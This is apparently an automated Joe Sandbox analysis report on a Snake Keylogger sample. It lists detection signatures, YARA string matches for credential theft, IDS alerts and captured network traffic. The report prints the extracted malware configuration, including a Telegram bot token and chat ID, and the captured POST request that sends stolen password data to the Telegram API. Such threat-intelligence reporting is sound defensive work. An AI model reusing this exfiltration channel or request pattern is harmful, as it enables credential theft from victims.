Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
Analysis ID:1618894
MD5:48303a0f6cf86a64328acc545192bff0
SHA1:2c9973e30e9697c5c8b6a91ecb3fbc8b05c3b455
SHA256:dcb42b8ad4e7cc40fe12cfef0f5b97fba6073716a6315784ed6dd8847a51e86d
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code contains very large strings
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendMessage?chat_id=7207594974", "Token": "7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s", "Chat_id": "7207594974", "Version": "5.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
    • 0x14297:$a1: get_encryptedPassword
    • 0x1457b:$a2: get_encryptedUsername
    • 0x140a3:$a3: get_timePasswordChanged
    • 0x1419e:$a4: get_passwordField
    • 0x142ad:$a5: set_encryptedPassword
    • 0x158e5:$a7: get_logins
    • 0x15848:$a10: KeyLoggerEventArgs
    • 0x154b3:$a11: KeyLoggerEventArgsEventHandler
    00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
    • 0x19262:$x1: $%SMTPDV$
    • 0x17c34:$x2: $#TheHashHere%&
    • 0x1920a:$x3: %FTPDV$
    • 0x17bd4:$x4: $%TelegramDv$
    • 0x154b3:$x5: KeyLoggerEventArgs
    • 0x15848:$x5: KeyLoggerEventArgs
    • 0x1922e:$m2: Clipboard Logs ID
    • 0x1946c:$m2: Screenshot Logs ID
    • 0x1957c:$m2: keystroke Logs ID
    • 0x19856:$m3: SnakePW
    • 0x19444:$m4: \SnakeKeylogger\
    00000002.00000002.4166196575.00000000029C2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000002.00000002.4166196575.0000000002920000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x14497:$a1: get_encryptedPassword
          • 0x1477b:$a2: get_encryptedUsername
          • 0x142a3:$a3: get_timePasswordChanged
          • 0x1439e:$a4: get_passwordField
          • 0x144ad:$a5: set_encryptedPassword
          • 0x15ae5:$a7: get_logins
          • 0x15a48:$a10: KeyLoggerEventArgs
          • 0x156b3:$a11: KeyLoggerEventArgsEventHandler
          2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
          • 0x1be50:$a2: \Comodo\Dragon\User Data\Default\Login Data
          • 0x1b082:$a3: \Google\Chrome\User Data\Default\Login Data
          • 0x1b4b5:$a4: \Orbitum\User Data\Default\Login Data
          • 0x1c4f4:$a5: \Kometa\User Data\Default\Login Data
          2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
          • 0x1503a:$s1: UnHook
          • 0x15041:$s2: SetHook
          • 0x15049:$s3: CallNextHook
          • 0x15056:$s4: _hook
          2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpackMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
          • 0x19462:$x1: $%SMTPDV$
          • 0x17e34:$x2: $#TheHashHere%&
          • 0x1940a:$x3: %FTPDV$
          • 0x17dd4:$x4: $%TelegramDv$
          • 0x156b3:$x5: KeyLoggerEventArgs
          • 0x15a48:$x5: KeyLoggerEventArgs
          • 0x1942e:$m2: Clipboard Logs ID
          • 0x1966c:$m2: Screenshot Logs ID
          • 0x1977c:$m2: keystroke Logs ID
          • 0x19a56:$m3: SnakePW
          • 0x19644:$m4: \SnakeKeylogger\
          Click to see the 19 entries

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-19T09:38:15.887786+010028033053Unknown Traffic192.168.2.449736104.21.80.1443TCP
          2025-02-19T09:38:19.799652+010028033053Unknown Traffic192.168.2.449744104.21.80.1443TCP
          2025-02-19T09:38:21.050636+010028033053Unknown Traffic192.168.2.449746104.21.80.1443TCP
          2025-02-19T09:38:22.318521+010028033053Unknown Traffic192.168.2.449748104.21.80.1443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-19T09:38:14.372897+010028032742Potentially Bad Traffic192.168.2.449734193.122.6.16880TCP
          2025-02-19T09:38:15.326010+010028032742Potentially Bad Traffic192.168.2.449734193.122.6.16880TCP
          2025-02-19T09:38:16.700942+010028032742Potentially Bad Traffic192.168.2.449738193.122.6.16880TCP
          2025-02-19T09:38:17.982215+010028032742Potentially Bad Traffic192.168.2.449741193.122.6.16880TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-19T09:38:29.738988+010028530061A Network Trojan was detected192.168.2.449756149.154.167.220443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-19T09:38:29.559612+010018100081Potentially Bad Traffic192.168.2.449756149.154.167.220443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendMessage?chat_id=7207594974", "Token": "7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s", "Chat_id": "7207594974", "Version": "5.1"}
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.7184.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendMessage"}
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeVirustotal: Detection: 37%Perma Link
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeReversingLabs: Detection: 27%
          Joe Sandbox ML detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Sample uses string decryption to hide its real strings
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpackString decryptor:
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpackString decryptor: 7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpackString decryptor: 7207594974
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpackString decryptor:
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpackString decryptor: 7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpackString decryptor: 7207594974
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpackString decryptor:
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpackString decryptor: 7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpackString decryptor: 7207594974

          Location Tracking

          barindex
          Tries to detect the country of the analysis system (by using the IP)
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49735 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49750 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: JcWm.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: Binary string: JcWm.pdbSHA256 source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then jmp 00DDF1F6h2_2_00DDF007
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then jmp 00DDFB80h2_2_00DDF007
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_00DDE528
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_00DDEB5B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_00DDED3C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then jmp 065802E9h2_2_06580040
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then jmp 06587C4Dh2_2_06587910
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then jmp 06584A91h2_2_065847E8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then jmp 06586A59h2_2_065867B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then jmp 06584EE9h2_2_06584C40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then jmp 06586EB1h2_2_06586C08
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then jmp 06585799h2_2_065854F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then jmp 06580741h2_2_06580498
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then jmp 06587761h2_2_065874B8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then jmp 06580FF1h2_2_06580D48
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then jmp 06586049h2_2_06585DA0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then jmp 065864CBh2_2_06586220
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then jmp 06584611h2_2_06584368
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then jmp 06587309h2_2_06587060
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then jmp 06580B99h2_2_065808F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then jmp 06585341h2_2_06585098
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 4x nop then jmp 06585BF1h2_2_06585948

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49756 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49756 -> 149.154.167.220:443
          Uses the Telegram API (likely for C&C communication)
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendDocument?chat_id=7207594974&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5132f24c205aHost: api.telegram.orgContent-Length: 569Connection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.6.168:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 193.122.6.168:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 193.122.6.168:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 104.21.80.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 104.21.80.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49736 -> 104.21.80.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 104.21.80.1:443
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49735 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49750 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: unknownHTTP traffic detected: POST /bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendDocument?chat_id=7207594974&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5132f24c205aHost: api.telegram.orgContent-Length: 569Connection: Keep-Alive
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000029F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002829000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002920000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002829000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.000000000286C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002920000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028F2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002761000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002920000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002841000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1710093134.0000000003021000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeString found in binary or memory: http://tempuri.org/DataTableUsers.xsd
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
